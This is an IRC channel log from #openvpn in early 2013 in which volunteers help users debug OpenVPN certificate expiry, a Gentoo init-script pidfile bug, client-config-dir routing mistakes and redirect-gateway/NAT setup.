pfire2> ya, working on that too 21:16 < pfire2> I only have a couple of days til it expires 21:19 < cosmicgate> sounds like you're living on borrowed time 21:20 < pfire2> very much so 21:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 21:24 <+pekster> Best to check such things before you go far away from physical access to stuff you care about. And maybe issue things for longer. If you're comfortable revoking lost/unused/compromised keys yourself, just issue them for 100 years or something and never run into that again 21:25 < pfire2> ya 21:25 < pfire2> ya, up'd to 10 years and replaced certs 21:25 < pfire2> all done :D 21:29 <+pekster> Don't forget to bounce services at both ends 21:29 <+pekster> And be sure you set permissions and file names properly, otherwise a restart will fail. That, or set up remote ssh access first as your dead-man's switch 21:30 <+pekster> And, maybe consider opening externall ssh after you properly harden/secure it (alt pot + pubkey only, no passwords.) 21:31 < pfire2> yep 21:31 < pfire2> ssh was done first 21:38 < cosmicgate> anyone know how to use the client-nat directive of openvpn 2.3? 21:38 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 21:46 -!- prometheanfire [~promethea@gentoo/developer/prometheanfire] has joined #openvpn 21:46 < prometheanfire> thanks for the help pekster :D 21:48 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 21:49 -!- pfire2 [~mthode@62.205.111.11] has quit [Quit: leaving] 22:00 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 22:11 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [] 22:17 -!- _quadDam1ge [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 22:19 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has quit [Read error: Connection reset by peer] 22:23 <+pekster> prometheanfire: np. I noticed the cloak on that account too; I've been a Gentoo fan for a while, and have it running on 2 headless boxes downstairs atm :) 22:52 -!- voyo [~voyo@213-134-188-198.home.aster.pl] has quit [Read error: Connection reset by peer] 23:03 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn 23:03 < phantomcircuit> !goal 23:03 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 23:04 < phantomcircuit> i have a server running 2.2.2 on gentoo which has 1 client successfully connected and working, i have another client on gentoo running 2.2.2 that doesn't even try to connect it just fails before it sends out a single udp packet 23:04 < phantomcircuit> Feb 1 04:57:46 localhost openvpn[27199]: Local Options hash (VER=V4): '41690919' 23:04 < phantomcircuit> Feb 1 04:57:46 localhost openvpn[27199]: Expected Remote Options hash (VER=V4): '530fdded' 23:04 < phantomcircuit> Feb 1 04:57:46 localhost openvpn[27199]: Exiting 23:04 -!- ura [~ura@unaffiliated/ura] has joined #openvpn 23:04 < ura> Good morning! 23:05 < phantomcircuit> there's a warning about the semantics of tls-remote and about script-security but nothing else 23:07 < ura> Does OpenVPN have built-in DHCP server? My tap interface on client side configured with IP from ifconfig-pool, but other machine, whose interface is bridget with tap0 is sending DHCP requests but getting no answers. 23:07 <+pekster> Try posting the logs, not snippits of them phantomcircuit. It's hard to know what the problem is when we're missing critical pieces 23:07 <+pekster> phantomcircuit: Also, using verb 4 will help identify issues. 3 or less leaves out potentially helpful info 23:07 < ura> So I tend to think what is often called "OpenVPN DHCP" is just an internal protocol for assigning IP to clients, but not real DHCP. 23:08 <+pekster> ura: OpenVPN client side uses a fake DHCP server to supporg eg: Windows DHCP 23:09 < ura> pekster, Thanks I will read this configuration. I must misconfigured, because my DHCP requests are not handled by openvpen and are going through tap interface to server. 23:09 < phantomcircuit> pekster, ok 23:09 < phantomcircuit> http://pastebin.com/raw.php?i=Na4vNJXZ 23:09 < phantomcircuit> verb = 11 23:09 <+pekster> Well, >5 is debugging only levels 23:09 <+pekster> Stick with 4, or maybe 5 if you really need per-packet RWrw in your logs 23:09 < phantomcircuit> it's still a short log even with verb=11 23:10 <+pekster> Yea, this is fine 23:10 <+pekster> Just for next time ;) 23:11 < phantomcircuit> yeah i set it higher after i noticed there wasn't any packet activity 23:11 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 23:12 < phantomcircuit> you know what i think it's being killed by the gentoo init script :| 23:13 < ura> pekster, But if I have Linux server and Linux client, and Windows machine bridged to tap0 can I use DHCP for windows machine? Would ip-win32 work in this case? 23:13 < phantomcircuit> openvpn openvpn.conf is working just fine :| 23:13 <+pekster> I use ovpn, currently 2.3.0, but I used to run 2.2.2 under Gentoo and it worked fine. Maybe it's the way something interacts with it? 23:13 <+pekster> phantomcircuit: Nvm, just gunna say to test that 23:13 <+pekster> phantomcircuit: See /etc/conf.d/openvpn for some init runtime config. Gentoo makes a mistake (IMO) by downgrading user privs itself unless you tell it not to 23:14 < phantomcircuit> PEER_DNS/DETECT_CLIENT/RE_ENTER 23:14 <+pekster> ura: If you use --ifconfig-pool, openvpn will get an IP out of that. If you want to use a LAN DHCP server instead, don't pass a pool and the DHCP requet hits your LAN server-side lstead 23:14 < phantomcircuit> nothing about user privs 23:14 < phantomcircuit> http://pastebin.com/raw.php?i=jNKk0yDa 23:15 <+pekster> Set DETECT_CLIENT="no", as that'll stop the user priv downgrade, IIRC 23:15 <+pekster> Oh, wait, no 23:15 <+pekster> Sorry, set 'user root' and 'group root' in yoru config 23:15 <+pekster> Or hack the initscript to suck less 23:15 <+pekster> I also have DETECT_CLIENT="no" for sanity 23:16 < ura> pekster, I see, so the only option to use DHCP on bridged Windows machine is to setup DHCP at server. I hoped that OpenVPN has built-in DHCP server which works as supplement to ifconfig-pool to aid setting ip on bridged machines. 23:16 <+pekster> Otherwise it does all sorts of silly stuff by calling its own up/down scripts; maybe you like that automatic behaviour, but I don't. Unless you wanted gentoo's init to downgrade privs to the 'openvpn' user, set the user/group to root in your ovpn config, or comment out those lines in the init 23:17 < phantomcircuit> pekster, it's an selinux install so i suspect lots of things will break horribly without the right users 23:17 < phantomcircuit> but i'll give it a shot 23:17 <+pekster> ura: No, the only "dhcp" stuff openvpn does is fake it to the client if the sever pushed an ip via --ifconfig-pool or --ifconfig-push 23:18 <+pekster> phantomcircuit: Yea, I'd imaine so. Try letting openvpn run as root, unless you've configured SELinux to let it work with 'openvpn' 23:18 <+pekster> An SELinux related channel is probably better for support since openvpn can't run without the right OS-level permissions, obviously 23:18 <+pekster> Or put SELinux into permissive mode and see what gets tripped to fix 23:19 <+pekster> I assume you have sec-policy/selinux-openvpn already? 23:19 < ura> pekster, I see. Thank you very much for explanation! 23:21 < phantomcircuit> root 2256 2255 0 05:21 ? 00:00:00 /usr/sbin/openvpn --config /etc/openvpn/openvpn.conf --writepid /var/run/openvpn.pid --daemon --setenv SVCNAME openvpn --cd /etc/openvpn --setenv PEER_DNS no 23:21 < phantomcircuit> exactly the same log output 23:22 <+pekster> What's SELinux log show? 23:22 <+pekster> I'm guessing denials 23:23 <+pekster> Again: put SELinux into permissive mode, which is the standard way to see what permissions an app is tripping that you must fix 23:23 <+pekster> I'm not very familiar with SELinux beyond high level understanding, so I won't be of specific help 23:23 < phantomcircuit> absolutely nothing :/ 23:23 < phantomcircuit> first thing i checked for 23:24 <+pekster> You can past your config and I can see if anything looks off there 23:24 < phantomcircuit> permissive/enforcing you get the same errors the only difference is they're enforced 23:24 <+pekster> But you should get an actual error message at some point 23:24 <+pekster> (in openvpn, that is; it's really good about explaining why it didn't do something prior to initilization) 23:24 < phantomcircuit> http://pastebin.com/raw.php?i=wm72QDpz 23:26 < phantomcircuit> pretty standard configuration 23:27 <+pekster> Yea. huh, no idea really 23:29 < phantomcircuit> it is bizarre isn't it :) 23:29 < phantomcircuit> i'll go bug someone in #gentoo 23:29 < phantomcircuit> it's clearly an init.d bug 23:30 <+pekster> phantomcircuit: I don't suppose if you set DETECT_CLIENT=no that helps? 23:31 <+pekster> That turns off some adjustment of options, like changing script-security to 2, and adding their own --up and --down options 23:31 < phantomcircuit> no it didn't i set that and then commented out the server part of the init script 23:31 <+pekster> I guess either way it may be a bug against the initscript when used in combination with SELinux 23:32 <+pekster> The "server part" of the initscript? 23:32 <+pekster> The client dtect stuff right after "if [ "${DETECT_CLIENT:-yes}" = "yes" ] && \ ..." is the part that's causing "client-looking config" to get extra commands added when you start it 23:32 < phantomcircuit> DETECT_CLIENT is an if/else that assumes if you have DETECT_CLIENT=no you're a server and should be running as openvpn 23:33 <+pekster> Yea; I disabsle both by setting DETECT_CLIENT=no and 'user root' 'group root' so that effectively does "nothing" 23:33 <+pekster> YMMV 23:36 < phantomcircuit> openvpn --up-delay --up-restart --cd /etc/openvpn/ --script-security 2 --up /etc/openvpn/up.sh --down-pre --down /etc/openvpn/down.sh --config /etc/openvpn/openvpn.conf 23:36 < phantomcircuit> which i think is all of the gentoo options works 23:36 -!- cosmicgate [~root@113.210.100.175] has quit [] 23:37 < phantomcircuit> so it's something about start-stop-daemon 23:37 -!- cosmicgate [~root@113.210.100.175] has joined #openvpn 23:37 <+pekster> huh, interesting 23:37 < phantomcircuit> the order of cmd line argument doesn't matter.. does it? 23:37 -!- cosmicgate is now known as Guest93345 23:37 <+pekster> Oh, it does becuase options after --config foo.conf over-write those, IIRC 23:38 <+pekster> So, can you repeate that CLI test with --config at the beginning? 23:38 < phantomcircuit> ahah 23:38 <+pekster> That'll probably reveal breakge, I hope 23:39 < phantomcircuit> i reordered them to match and now i get the same result as init 23:39 <+pekster> So, now you know it's one of the gentoo-specific init flags that's breaking it 23:39 <+pekster> Figure out which one and remove/fix it ;) 23:39 <+pekster> Then send it upstream, because that's a really nasty bug 23:40 < phantomcircuit> there's no /var/run directory 23:40 -!- catsup [d@64.111.123.163] has joined #openvpn 23:40 < phantomcircuit> gentoo moved to /run 23:40 < phantomcircuit> lol 23:40 <+pekster> You're kidding, *that* broke it? :x 23:40 < phantomcircuit> --writepid /var/run/openvpn.pid is what's breaking it 23:40 <+pekster> Probably file the bug against SELinux, not openvpn then 23:40 <+pekster> Their team needs to fix the openvpn SELinux packag 23:40 < phantomcircuit> that was it 23:41 < phantomcircuit> it's a gentoo bug in general the init script should be using /run not /var/run 23:41 < phantomcircuit> i'll file it with gentoo against the portage package 23:41 <+pekster> Well, /var/run is a symlink to /run, no? 23:41 < phantomcircuit> it's probably also an openvpn bug that there's no error though 23:42 <+pekster> No, because start-stop-daemon is the one creating the PID 23:42 < phantomcircuit> normally it would be but somehow it got disappeared on this system 23:42 < phantomcircuit> no actually this init script has both start-stop-daemon and openvpn creating a pid file 23:42 <+pekster> Oh, yea, missed that 23:43 <+pekster> You could just put the symlink back 23:43 < phantomcircuit> so this appears to be both an openvpn bug and a gentoo portage bug 23:43 <+pekster> No clue why that's not there. I have a recent-ish install (maybe 6mo old) and it's there 23:43 < phantomcircuit> the openvpn bug being that there's mysteriously no error 23:44 <+pekster> I wonder if that's an SELinux thing, or not though. Let me try to test real quick. So you had openvpn [whatever] --writepid /var/does-not-exist/openvpn.blah.pid, right? 23:45 < phantomcircuit> yeah 23:45 <+pekster> 2.2.2? (I'll need to build that real quick into /usr/local if you're not on 2.3.0) 23:45 < phantomcircuit> yeah 23:46 < phantomcircuit> im fairly certain it isn't an selinux bug 23:46 <+pekster> k, gimmie a few to rebuild, and I'll see if I can reproduce here (if you'd like that info for the bugreport at least) 23:46 < phantomcircuit> all selinux denials are logged to the kernel message buffer 23:46 < phantomcircuit> and there wasn't anything logged 23:46 <+pekster> Sure, that makes sense 23:51 <+pekster> So, while 2.2.2 builds, 2.3.0 does the proper thing for me: Options error: --writepid fails with '/var/nowhere/openvpn.remote.pid': No such file or directory 23:51 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn 23:52 <+pekster> Same with 2.2.2 as well 23:52 <+pekster> Open error on pid file /var/nowhere/openvpn.remote.pid: No such file or directory (errno=2) 23:52 < phantomcircuit> msg (M_ERR, "Open error on pid file %s", filename); 23:53 < phantomcircuit> does that look right for an error line? 23:53 <+pekster> FWIW, I'm running 32-bit, with the following build opts: ./configure --prefix=/usr/local/apps/openvpn-2.2.2 --enable-password-save --enable-iproute2 23:53 <+pekster> Yea, msg() then fatally exists with an error flag passed, in this case M_ERR 23:54 <+pekster> Oh, no, but there should be code below that to exit, I think 23:54 <+pekster> Still, no clue why it doesn't get loged :\ 23:57 < phantomcircuit> and actually it doesn't even look like it should be a fatal error 23:57 < phantomcircuit> it appears to be designed to log the error and carry on 23:58 <+pekster> Well, it definitly cuased it to fatally exit for me 23:58 <+pekster> Notice in error.c it does a binary AND with M_FATAL, so maybe error.h has bitmasks for that? --- Day changed Fri Feb 01 2013 00:00 -!- grey__ [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn 00:01 < phantomcircuit> error.h is one giant hack around broken compilers :| 00:01 < phantomcircuit> while (false) 00:01 < phantomcircuit> heh 00:02 <+pekster> #define M_ERR (M_FATAL | M_ERRNO) 00:02 <+pekster> So M_ERR implies M_FATAL 00:02 <+pekster> Which causes msg() to eventually exit 00:02 <+pekster> So, it "should" print that message for you, and "should" exit 00:02 <+pekster> And my 2.2.2 build does 00:03 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has quit [Ping timeout: 244 seconds] 00:03 <+pekster> I'm not saying yours doesn't do differently, but I'm not sure why exactly 00:04 <+pekster> Code says that's not supposed to happen ;) 00:04 < phantomcircuit> heh 00:22 -!- adolfomaltez [~taro@190.62.238.211] has quit [Ping timeout: 248 seconds] 00:29 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [] 00:29 -!- SpookZA [~SpookZA@dsl-146-42-248.telkomadsl.co.za] has quit [Ping timeout: 276 seconds] 00:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 00:39 -!- adolfomaltez [~taro@190.62.211.253] has joined #openvpn 00:44 -!- cosmicgate-- [~root@198.148.120.32] has joined #openvpn 00:46 -!- Guest93345 [~root@113.210.100.175] has quit [Ping timeout: 252 seconds] 00:50 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 00:51 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 01:08 < prometheanfire> pekster: :D 01:08 < prometheanfire> pekster: noticed some selinux questions, if you have any let me know :D 01:09 < phantomcircuit> prometheanfire, there's some weirdness with an error message disappearing 01:10 < phantomcircuit> dont think it's selinux related though 01:11 <+pekster> Yea, that's the weird part. You get other logs, so clearly the log write is allowed. But I get the all-important message you don't, somehow 01:11 <+pekster> But it exitsi as if it was passed through that msg() function :\ 01:11 <+pekster> exit is* 01:41 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 01:45 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 255 seconds] 01:55 -!- manitu [~Thunderbi@h-213.61.163.68.host.de.colt.net] has joined #openvpn 01:56 < manitu> !welcome 01:56 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 01:56 < manitu> !goal 01:56 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 01:56 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 01:58 < manitu> 'I would like to run openvpn in a failover cluster'.. is there any implementation for this or do i just bind openvpn to my failover ip and start it on both servers? 02:02 < manitu> second question: someone here wrote a program to control access and that stuff, what was the name of this? 02:08 < manitu> yet another problem: if i change a ccd-file i need to reload or it won't be detected.. but if i reload all my clients disconnect.. is there no "softer" way? 02:12 < cosmicgate--> no need to reload 02:12 < cosmicgate--> for fail-over, just start openvpn on a new daemon 02:15 < manitu> cosmicgate--: the strange thing is i tried to create a new certificate, created a ccd and let the client connect after, but the ccd config didn't work at all :/ 02:16 < cosmicgate--> show me the contents of the ccd file 02:17 < manitu> cosmicgate--: uh.. don't know right now, happened some time ago, but they looks basically like: 02:17 < manitu> !paste 02:17 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 02:18 < manitu> http://pastebin.com/Uay4tbhz 02:18 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 276 seconds] 02:18 < manitu> i don't know if the last push is required, but the one before me did this, so i also do it :o 02:19 <+pekster> manitu: That push should go in the main config file, not the ccd file, if and only if you want *other* clients to access that host owned by that client (the one the ccd is named after) 02:19 <+pekster> Well, either way you need to make the server aware of it via a 'route' command on the server-side 02:20 <+pekster> The manpage desscribes this behaviour in the --iroute option pretty well 02:21 < manitu> pekster: since not ever vpn-user should know every other it is not in the main.. the users certs have /24 routes in it.. don't worry about that it wouldn't be routed.. and i know you manually could add the route :) 02:21 <+pekster> No, my point is pushing a route (the /32 host-route) in the ccd that matches an iroute is a mistake 02:22 <+pekster> Don't do that. Then go read --iroute in the manpage to learn why, and what you need to do to make that iroute statement actually work 02:22 < manitu> pekster: i thought so.. but it seems to work.. i didn't write that down, just didn't remove it :/ 02:23 < cosmicgate--> manitu: ifconfig-push is in the wrong format 02:23 < cosmicgate--> are you using tun or tap? 02:23 < manitu> cosmicgate--: on the server side its tun 02:23 <+pekster> Oh, yea, good catch. Even in PtP those need to be unique 02:23 < manitu> the client side is for the "computer clients" tun too 02:24 <+pekster> You should post your server config too, becuase many things are not correct in that ccd file 02:24 < manitu> pekster: what should be unique in which was? 02:24 <+pekster> see --ifconfig-push in the manpage 02:24 <+pekster> That is bogus becuase the IPs are the same 02:24 <+pekster> So, basically your entire ccd file is full of errors 02:27 < manitu> pekster: the second parameter is a netmask? like 255.255.255.255?.. is it still PtP? 02:27 < cosmicgate--> manitu: change your ifconfig-push to ifconfig-push 172.16.3.69 172.16.3.70 for windows 02:27 < cosmicgate--> if its linux then it should be 172.16.3.69 255.255.255.0 02:28 < manitu> cosmicgate--: ah.. so its the gateway.. is there no way just to use one ip per client? 02:28 <+pekster> Well, depends on the topology really 02:28 < cosmicgate--> yup 02:28 <+pekster> manitu: There is. --topology subnet 02:28 < cosmicgate--> just set topology subnet 02:28 < manitu> cosmicgate--: windows on serverside or client side? 02:28 < cosmicgate--> manitu:server side, ccd 02:30 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection] 02:31 < manitu> cosmicgate--: changed one of my client ccds to netmask 255.255.255.0 and push "topology p2p", seems to work fine 02:33 < cosmicgate--> ok 02:33 <+pekster> Well, that's also not really what you intended, but it "works" becuase the PtP on the client is peering with the "IP" 255.255.255.0 02:34 < manitu> thank you already.. here is the server config http://pastebin.com/T1aPbYsu 02:34 <+pekster> Good timing; I was about to leave (it's late here) and not having a server config didn't motivate me to help 02:35 < manitu> pekster: i'm sorry for taking your time.. i didn't even wrote the configs :/ .. thank you for checking it 02:35 <+pekster> You really don't want a /16 for openvpn. It doesn't hurt, but you can't actually connect that many clients anyway. I'd switch to a /24, but that's your call 02:36 <+pekster> The push on line 21 is unnecessary: the --server directive already pushes the entire /16, so you don't need it (and if you reduce it to a /24, say 172.16.2.0/24, that'll be implicit anyway) 02:36 < manitu> pekster: route just routes internal, right? .. the thing is that we have some categories of clients and every gets a /24 in the 192.168 section.. in the client ccd there is written something like 'push "route 192.168.10.0 255.255.255.0"' 02:37 <+pekster> Don't push a route like that 02:37 <+pekster> Line 18 in your server config already pushes the supernet to clients 02:37 <+pekster> Just define an iroute for whatever network is "behind" each one 02:37 <+pekster> No 'push "route"' junk in the ccd files 02:38 < manitu> pekster: is there some way of access management then? .. some clients should stay in its /24 network and some have access to every client 02:38 <+pekster> So, 1) delete line 21 in the server config you pasted (it's worthless) 2) remove the unnecessary 'push "route"' statements that overlap with the route on line 18 02:39 <+pekster> 3) set 'topology subnet' in the server config (this sounds like what you want, and it include a --push "topology subnet" since you're using --server too) 02:39 < manitu> pekster: the 192.168.0.0/16 is not shared to the clients as i see on my connected computer 02:40 <+pekster> 4) make sure every client ccd file is formated like this: ifconfig-push 172.16.a.b 255.255.0.0 (match that subnet to the one in your --server directive) 02:40 <+pekster> manitu: Oh, I see. Yea, you don't have a push for that, sorry. So are all clients supposed to be inter-connected? Then just push that too 02:40 <+pekster> In the main server config 02:40 <+pekster> push "route 192.168.0.0 255.255.0.0" 02:40 <+pekster> Also, that'll eat up the common 192.168.0.0/24 and 192.168.1.0/24 networks, which could cause you site issues. Adjust accordingly 02:40 < manitu> pekster: thats why there are pushs in the ccd.. to just share one of the subnets or sometimes just one single client 02:41 <+pekster> Um, I guess you can do that. Seems a pain to manage and not clean in the least 02:41 <+pekster> But this is wrong: http://pastebin.com/Uay4tbhz 02:41 <+pekster> Don't ever push the route to something you define in an iroute 02:41 <+pekster> See --iroute why 02:42 < manitu> pekster: thought so already.. removed that push :) 02:42 < manitu> that config is the one for clients which should just access 172.16.a.b 02:43 <+pekster> And apparently also "owns" 192.168.0.73/32 ? 02:43 < manitu> its a gprs "device" which has a internal lan 02:44 <+pekster> (remember, you can't re-use that IP, including in a larger netmask. So if you did 'iroute 192.168.0.0 255.255.255.0' in another ccd, that will cause problems) 02:44 < manitu> and one client with 192.168.0.73.. thats why there is an iroute 02:44 <+pekster> You need unique network addressing everywhere you route to 02:44 <+pekster> Yea, this is fine as long as you support it routing-wise across your infrastructure. It's a little weird to do it for a /32 like that, but allowed 02:44 < manitu> the problem is that every gprs client has a single device so 192.168.0.73 255.255.255.255 02:45 < manitu> and that devices sadly doesn't support any nat stuff 02:46 < manitu> and we won't do iroute with more then /24 .. they are managed in a database for that :) 02:46 -!- cosmicgate-- [~root@198.148.120.32] has quit [Ping timeout: 252 seconds] 02:47 < manitu> pekster: i'm a bit scared taking the server changes on a productive server right now.. need to test more :D 02:47 <+pekster> I'd suggest you do testing, yes 02:48 <+pekster> Maybe also look at --client-connect if things are in a backend table/database since it may be cleaner to key off of that than manually-managed ccd files 02:48 <+pekster> Anyway, I need some sleep. The suggestions I posted above with numbers are a good place to start, and see the manpage for all the options I just gave you 02:49 < manitu> thank you very much and sleep well :) 02:49 < manitu> here its nearly 10am.. so the day is just starting :D 02:50 <+pekster> Fri Feb 1 02:50:01 CST 2013 02:50 <+pekster> :) 02:50 -!- mode/#openvpn [-v pekster] by ChanServ 03:18 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:35 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn 03:41 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 03:48 -!- dazo_afk is now known as dazo 04:01 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 04:02 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 04:06 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 04:10 -!- Netsplit *.net <-> *.split quits: digilink, prometheanfire, cyberspace-, nutron, grey__ 04:12 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 04:12 -!- u0m3_ [~Radu@92.80.84.80] has quit [Read error: Connection reset by peer] 04:13 -!- 45PABRYG3 [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn 04:13 -!- prometheanfire [~promethea@gentoo/developer/prometheanfire] has joined #openvpn 04:13 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 04:13 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 04:14 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 04:15 -!- u0m3 [~Radu@92.80.92.99] has joined #openvpn 04:21 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 04:40 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 04:42 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 04:56 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 04:57 -!- Saviq_ [~Saviq@nat/canonical/x-ksvsphicsbzrziye] has joined #openvpn 04:57 -!- Saviq_ [~Saviq@nat/canonical/x-ksvsphicsbzrziye] has quit [Client Quit] 05:03 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 05:06 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 05:20 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 05:22 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn 05:22 < Eagleman> I start my openvpn client with: remote example.com 1195 However when i run netstat -plnu | grep 119, i get this: udp 0 0 0.0.0.0:1194 0.0.0.0:* 14411/openvpn ANy idea why this happens? 05:33 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:40 -!- Dashers [dash@home.aligrant.com] has joined #openvpn 05:41 < Dashers> Morning - so, anybody got TAP working on a Linux server? I've got mine connecting up, getting an address from a standalone DHCP server etc. But, I cannot ping from the server to the client (although I can ping client to server, go figure). Any ideas? 05:42 < havoc> client firewall is blocking it 05:43 < havoc> check inbound rule(s) on your client 05:43 < Dashers> no firewalls :/ 05:43 < Dashers> actually, forget the client being able to ping, I don't think it is. 05:43 < Dashers> Looking at tcpdump the ping is coming over the public network not the vpn device 05:43 < havoc> bad/missing route then 05:44 < Dashers> route? it's a TAP ethernet bridge 05:44 < havoc> yet another piece of info you neglected to mention ;) 05:45 < Dashers> " anybody got TAP working" 05:45 < havoc> check your routes, the route for that subnet should be using the bridge device 05:45 < havoc> ...on both ends 05:46 < Dashers> um, there is no subnet? it's an ethernet bridge 05:46 < havoc> if there is a network, there is a subnet 05:46 < havoc> i.e. local IP/MASK 05:46 < Dashers> Yeah, but everything is on the same subnet. So nothing contacts the gateway as it's all internal to the local subnet 05:46 < Dashers> So, there is no routing performed 05:46 < Dashers> so no routes 05:47 < havoc> there is *ALWAYS* routing 05:47 < Dashers> Not layer 3 05:47 < havoc> every machine has a local routing table 05:47 < havoc> and this is layer 2, not 3 05:47 < havoc> you said TAP, and layer 3 cannot be bridged 05:47 < Dashers> indeed so the local routing table doesn't need to be adjusted 05:47 < Dashers> as the local routing tables operate at layer 3 05:49 < Dashers> Should the server tap0 device have it's own IP address? 05:49 < Dashers> As the br0 device has a single address 05:49 < Dashers> which bridges tap0 and eth0 06:08 < Eagleman> I start my openvpn client with: remote example.com 1195 However when i run netstat -plnu | grep 119, i get this: udp 0 0 0.0.0.0:1194 0.0.0.0:* 14411/openvpn ANy idea why this happens? 06:09 < Eagleman> server and client are both configured to listen and connect to port 1195 06:12 -!- julius [~julius@141.41.92.122] has joined #openvpn 06:12 -!- julius is now known as julius_ 06:12 < julius_> hi 06:13 < julius_> ive added push "redirect-gateway" to my openvpn client config, but route says that destination 0.0.0.0 still goes over my lan interface eth0 06:13 < julius_> shoudlnt it say that 0.0.0.0 goes over tun1 now? 06:14 < Eagleman> there should be two 0.0.0.0 routes 06:16 -!- cosmicgate [~cosmic@46.249.33.19] has joined #openvpn 06:18 < julius_> ah, its needed on the server side 06:21 < julius_> i only see one 0.0.0.0 entry now 06:21 < julius_> but that goes over tun0 06:25 < julius_> now even the dns traffic goes over the openvpn right? 06:29 -!- dazo is now known as dazo_afk 06:33 < Dashers> yup 06:33 < Dashers> unless you have any explicit routes redirecting it 06:34 < julius_> the openvpn server at the other end is behind a router, do i need to make the openvpn server itself capable for routing? 06:35 < julius_> i mean with commands like: sysctl -w net.ipv4.ip_forward=1 06:35 < julius_> iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 06:35 < Dashers> yeah, you need to enable ip forwarding as the server is now a router between two networks 06:35 < Dashers> You'll also need to ensure that devices on the remote network know how to get to your vpn subnet 06:36 -!- ispirto^s_manbro [~cosmic@46.249.33.19] has joined #openvpn 06:36 < julius_> only forwarding, no masquerading needed? 06:37 < Dashers> Personally I use LAN:192.168 -> Server <-VPN 10.8 -> Server <- Another LAN 172.16 06:37 -!- cosmicgate [~cosmic@46.249.33.19] has quit [Ping timeout: 255 seconds] 06:37 < Dashers> Yeah, you're just routing networks 06:38 < Dashers> Providing that the other devices have the route for your VPN then it should all be funky 06:42 < julius_> of what other devices to you speak? 06:42 < julius_> for now i only need one client being able to communicate over the server 07:02 -!- master_of_master [~master_of@p57B55CF7.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 07:03 < julius_> Dashers, in my case i also needed the nat 07:04 -!- master_of_master [~master_of@p57B52C3E.dip.t-dialin.net] has joined #openvpn 07:04 -!- stephan48 [stephan@opennic/stephan] has quit [Quit: Lost terminal] 07:11 -!- Eagleman [~Eagleman@5.45.183.189] has quit [] 07:15 -!- Dashers [dash@home.aligrant.com] has quit [Quit: leaving] 07:21 -!- adolfomaltez [~taro@190.62.211.253] has quit [Remote host closed the connection] 07:26 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 07:31 -!- Fabius [~Sbratzber@187.110.4.106] has quit [Quit: Saindo] 07:47 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 07:50 -!- brute11k1 [~brute11k@89.249.231.238] has joined #openvpn 07:52 -!- brute11k [~brute11k@89.249.235.236] has quit [Ping timeout: 276 seconds] 07:55 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.] 08:01 < manitu> someone with voice here wrote that openvpn extension for filtering and access management if i understood it right.. do someone have the project name? 08:13 -!- ispirto^s_manbro [~cosmic@46.249.33.19] has quit 